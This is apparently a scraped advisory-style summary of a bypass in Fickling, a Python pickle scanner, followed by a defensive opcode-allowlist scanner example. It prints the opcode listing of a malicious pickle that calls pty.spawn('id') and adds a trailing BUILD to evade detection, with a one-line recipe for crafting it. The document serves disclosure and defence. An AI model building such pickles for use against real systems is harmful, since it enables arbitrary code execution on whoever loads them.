This vulnerability is a heuristic bypass in Fickling, a security tool for analyzing Python pickle files. To flag potentially malicious files, Fickling relies on detecting unused variables left on the Python pickle virtual machine stack after execution. Opcodes such as REDUCE, OBJ, and INST, which can trigger arbitrary code execution, often leave a value on the stack. An attacker can bypass this detection by crafting a pickle file that includes a trivial operation, such as a BUILD opcode, to "use" the leftover variable, for instance by adding a __setstate__ method. This tricks Fickling into marking the file as safe. Specifically, the bypass involved importing the 'pty' module and using pty.spawn() for code execution, which was missing from Fickling's block list of unsafe imports. Consequently, malicious pickles designed to execute commands are incorrectly classified as LIKELY_SAFE, leading to arbitrary code execution if the deceptive file is unpickled.
Platform: Fickling
Version: Pre-fix versions
Vulnerability: Heuristic bypass
Severity: Critical
Date: Unknown
Prediction: Fixed in PR187
What Undercode Say:
fickling -r malicious.pkl
 0: \x80 PROTO 4
 2: \x95 FRAME 26
11: \x8c SHORT_BINUNICODE 'pty'
16: \x94 MEMOIZE
17: \x8c SHORT_BINUNICODE 'spawn'
24: \x94 MEMOIZE
25: \x93 STACK_GLOBAL
26: \x94 MEMOIZE
27: \x8c SHORT_BINUNICODE 'id'
31: \x94 MEMOIZE
32: \x85 TUPLE1
33: \x94 MEMOIZE
34: R REDUCE
35: \x94 MEMOIZE
36: \x8c SHORT_BINUNICODE 'gottem'
44: \x94 MEMOIZE
45: b BUILD
46: . STOP
How Exploit:
Craft pickle with pty.spawn() and BUILD opcode.
Protection from this CVE:
Update Fickling version.
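As a defence-in-depth check alongside updating, the added example below (not Fickling's code and not from the original report) walks the opcode stream with pickletools and rejects any import outside an allowlist, so a trailing BUILD that "uses" the stack value has no effect on the verdict. The allowlist contents, the function names, and the placeholder module name in the constructed sample are assumptions made for illustration.

```python
import pickle
import pickletools

# Opcodes that call or configure objects while loading (the page names REDUCE, OBJ, INST, BUILD).
CALL_OPS = {"REDUCE", "OBJ", "INST", "NEWOBJ", "NEWOBJ_EX", "BUILD"}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}

# Assumption: the only import this application's own pickles ever need.
ALLOWED = {("collections", "OrderedDict")}

def scan_pickle(data, allowed=ALLOWED):
    """Walk the opcode stream without unpickling; reject any import not allowlisted."""
    strings, imports, calls = [], [], []
    for op, arg, pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            strings.append(arg)
        elif op.name in ("GLOBAL", "INST"):
            module, _, name = arg.partition(" ")
            imports.append((module, name))
        elif op.name == "STACK_GLOBAL":
            # Simplification: take the two most recent string pushes as module/name.
            # Anything that cannot be resolved is recorded as ("?", "?") and rejected.
            imports.append(tuple(strings[-2:]) if len(strings) >= 2 else ("?", "?"))
        if op.name in CALL_OPS:
            calls.append((pos, op.name))
    denied = [imp for imp in imports if imp not in allowed]
    return {"verdict": "REJECT" if denied else "OK", "denied": denied, "calls": calls}

def _push(text):
    """SHORT_BINUNICODE <text> followed by MEMOIZE."""
    raw = text.encode()
    return b"\x8c" + bytes([len(raw)]) + raw + b"\x94"

# Constructed sample with the same opcode shape as the listing above
# (import, REDUCE, then BUILD consuming the result). Names are placeholders.
SAMPLE = (b"\x80\x04" + _push("placeholder_mod") + _push("run") + b"\x93\x94"
          + _push("arg") + b"\x85\x94" + b"R\x94" + _push("state") + b"b.")

if __name__ == "__main__":
    print(scan_pickle(SAMPLE))
    print(scan_pickle(pickle.dumps({"a": [1, 2]}, protocol=4)))
```

The scanner never loads the data, so it can run on untrusted files before any call to pickle.load.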
Impact:
Arbitrary code execution.
Sources:
Reported By: github.com

